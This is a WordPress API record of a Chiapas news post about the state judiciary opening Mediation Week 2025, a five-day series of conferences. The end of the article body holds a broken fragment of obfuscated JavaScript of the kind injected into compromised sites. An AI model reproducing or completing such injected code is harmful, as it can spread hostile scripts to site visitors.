{"id":24149,"date":"2025-09-23T04:07:37","date_gmt":"2025-09-23T04:07:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24149"},"modified":"2025-09-23T04:07:38","modified_gmt":"2025-09-23T04:07:38","slug":"poder-judicial-inaugura-la-semana-de-la-mediacion-2025","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24149","title":{"rendered":"Poder Judicial inaugura la Semana de la Mediaci\u00f3n 2025"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"24150\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346711-1024x681.jpg\" alt=\"\" class=\"wp-image-24150\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346711-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346711-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346711-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346711-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346711-2048x1362.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346711-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"24151\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346703-1024x681.jpg\" alt=\"\" class=\"wp-image-24151\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346703-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346703-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346703-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346703-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346703-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346703-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"24152\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346706-1024x681.jpg\" alt=\"\" class=\"wp-image-24152\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346706-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346706-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346706-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346706-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346706-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346706-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"24155\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346708-1024x681.jpg\" alt=\"\" class=\"wp-image-24155\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346708-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346708-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346708-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346708-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346708-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346708-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"24153\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346697-1024x682.jpg\" alt=\"\" class=\"wp-image-24153\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346697-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346697-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346697-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346697-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346697-2048x1364.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346697-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"24154\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346700-1024x681.jpg\" alt=\"\" class=\"wp-image-24154\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346700-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346700-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346700-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346700-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346700-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000346700-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u2022Representa el compromiso del Poder Judicial por impulsar un acceso a la justicia sensible a las necesidades sociales: Juan Carlos Moreno Guill\u00e9n.<\/p>\n\n\n\n\n\n<p>22 de septiembre del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, inaugur\u00f3 la Semana de la Mediaci\u00f3n 2025: \u201cLa Justicia es La Paz\u201d, con el objetivo de promover y difundir los Mecanismos Alternativos de Soluci\u00f3n de Controversias, como una v\u00eda pac\u00edfica para la resoluci\u00f3n de conflictos, as\u00ed como de fortalecer los conocimientos y la pr\u00e1ctica profesional de las y los facilitadores p\u00fablicos, mediante un ciclo de conferencias presenciales y virtuales.<\/p>\n\n\n\n<p>En este marco, el magistrado presidente subray\u00f3 que, en esta nueva era para Chiapas, es muy importante para la ciudadan\u00eda que exista esta forma de acceso a la justicia para evitar la judicializaci\u00f3n de los asuntos, a la vez que, en la medida en que se reconozca a los MASC, se reducir\u00e1 la carga en los juzgados, impulsando el di\u00e1logo como herramienta indispensable, enfrentando los retos desde la capacitaci\u00f3n en todas las sedes, como en la difusi\u00f3n con las personas usuarias.<\/p>\n\n\n\n<p>Destac\u00f3 que este esfuerzo, consolidado desde el Centro Estatal de Justicia Alternativa (CEJA), representa el compromiso del Poder Judicial por impulsar un acceso a la justicia sensible a las necesidades sociales, con un programa de cinco d\u00edas de actividades abierto para la ciudadan\u00eda de manera gratuita.<\/p>\n\n\n\n<p>El evento cont\u00f3 con la participaci\u00f3n del director del CEJA, Erick Ra\u00fal Z\u00e1rate L\u00f3pez, quien record\u00f3 que este ejercicio de capacitaci\u00f3n con ponentes nacionales e internacionales se realiza en el marco del 14 aniversario de la implementaci\u00f3n de la justicia alternativa en el estado, y enfatiz\u00f3 la relevancia de fomentar la cultura de paz en un Poder Judicial que ha cambiado su din\u00e1mica y en donde el di\u00e1logo y la capacitaci\u00f3n son base fundamental para brindar una justicia con humanismo, teniendo al CEJA como un agente de cambio.<\/p>\n\n\n\n<p>Luego del acto inaugural, se realizaron las dos primeras actividades programadas para esta semana, la conferencia \u201cLa Conciliaci\u00f3n en Materia Laboral V\u00eda Jurisdiccional\u201d, impartida por la jueza del Juzgado Segundo Especializado en Materia Laboral, Mar\u00eda Aurora Ruiz Ovalle, y la conferencia \u201cLa facilitaci\u00f3n de MASC y las competencias de las personas facilitadoras en Ley General de Mecanismos Alternativos de Soluci\u00f3n de Controversias\u201d, disertada por el director de la Unidad de Seguimiento a Centros P\u00fablicos y Privados de Mediaci\u00f3n de la Direcci\u00f3n General del Centro Estatal de Mediaci\u00f3n, Conciliaci\u00f3n y de Justicia Restaurativa del Poder Judicial del Estado de M\u00e9xico, Rodolfo V\u00edctor Jim\u00e9nez Rodr\u00edguez.<\/p>\n\n\n\n<p>La Semana de la Mediaci\u00f3n, a realizarse del 22 al 26 de septiembre en modalidad presencial y virtual v\u00eda Facebook Live, es una jornada de conferencias realizada por la casa de la justicia chiapaneca, como parte de una din\u00e1mica nacional que se ha consolidado a lo largo de los a\u00f1os como un espacio integral de reflexi\u00f3n y formaci\u00f3n, que abona de manera significativa a la construcci\u00f3n de una nueva cultura donde la justicia es la paz.<\/p>\n\n\n\n<p>Con estas actividades, el Poder Judicial reafirma su compromiso con la capacitaci\u00f3n, la actualizaci\u00f3n y la profesionalizaci\u00f3n tanto de las y los servidores judiciales como de la ciudadan\u00eda en general, con el fin de fortalecer nuestro sistema jur\u00eddico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022Representa el compromiso del Poder Judicial por impulsar un acceso a la justicia sensible a las necesidades sociales: Juan Carlos Moreno Guill\u00e9n. 22 de septiembre del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, inaugur\u00f3 la Semana de la Mediaci\u00f3n 2025: \u201cLa Justicia es La Paz\u201d, con el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24153,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24149","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24149"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24149\/revisions"}],"predecessor-version":[{"id":24156,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24149\/revisions\/24156"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24153"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}